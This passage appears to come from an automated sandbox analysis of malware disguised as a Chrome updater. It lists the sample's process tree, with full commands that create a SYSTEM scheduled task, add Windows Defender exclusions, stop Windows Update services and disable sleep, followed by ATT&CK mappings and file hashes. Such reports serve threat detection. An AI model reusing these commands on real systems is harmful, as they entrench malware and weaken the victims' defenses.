PID:1676 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1252
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2472
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:888
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1700
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1908
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2124
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1748 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1696
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2316
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0B40C90E-EDC3-43D9-952E-CCC9B7DF66D7} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1284
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD58cc9943fd06e9a92050887259a4e3abd
SHA1ba8de942c1a4c1a2d73b8e60e17c573029f6582d
SHA25648d3a16fe3dcb8805a4076a2e6e30bd065f898cbbf87a4648414c08486613fb9
SHA5124a8fd1dc6044e1220e94f6f31276e316ff749d93664288492ebee9c66e2e7fd088a80da9a593ba284be170e1055fa8f4d9e0e186c421676326d423fb02d6f6bb
-
Filesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
Filesize
164KB
MD54ff65ad929cd9a367680e0e5b1c08166
SHA1c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27
-
Filesize
9.9MB
MD580b0b41decb53a01e8c87def18400267
SHA1885f327c4e91065486137ca96105190f7a29d0f9
SHA25610d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA51219bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e
-
Filesize
9.9MB
MD580b0b41decb53a01e8c87def18400267
SHA1885f327c4e91065486137ca96105190f7a29d0f9
SHA25610d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA51219bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD50bc7b4b4f4ffe0ec4c24f028675b9470
SHA11af4518b0bc179ea15f8a9140cb2191230b7d1ea
SHA25641f6075998a62c186388d98c805ab7c889befeb85d069367738756cd2b341d06
SHA512ef24ec6b46f113dc12faa71d842d824abee5d1c51f34274c43f435232ae480d732b8acf7c83a6c550e635909cb329c7ffad03a49bd4ee0210e30fdcc516c6fb3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NRXI7IT8VTPR1E46ZB87.temp
Filesize7KB
MD50bc7b4b4f4ffe0ec4c24f028675b9470
SHA11af4518b0bc179ea15f8a9140cb2191230b7d1ea
SHA25641f6075998a62c186388d98c805ab7c889befeb85d069367738756cd2b341d06
SHA512ef24ec6b46f113dc12faa71d842d824abee5d1c51f34274c43f435232ae480d732b8acf7c83a6c550e635909cb329c7ffad03a49bd4ee0210e30fdcc516c6fb3
-
Filesize
2KB
MD52b19df2da3af86adf584efbddd0d31c0
SHA1f1738910789e169213611c033d83bc9577373686
SHA25658868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA5124a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.9MB
MD580b0b41decb53a01e8c87def18400267
SHA1885f327c4e91065486137ca96105190f7a29d0f9
SHA25610d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA51219bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379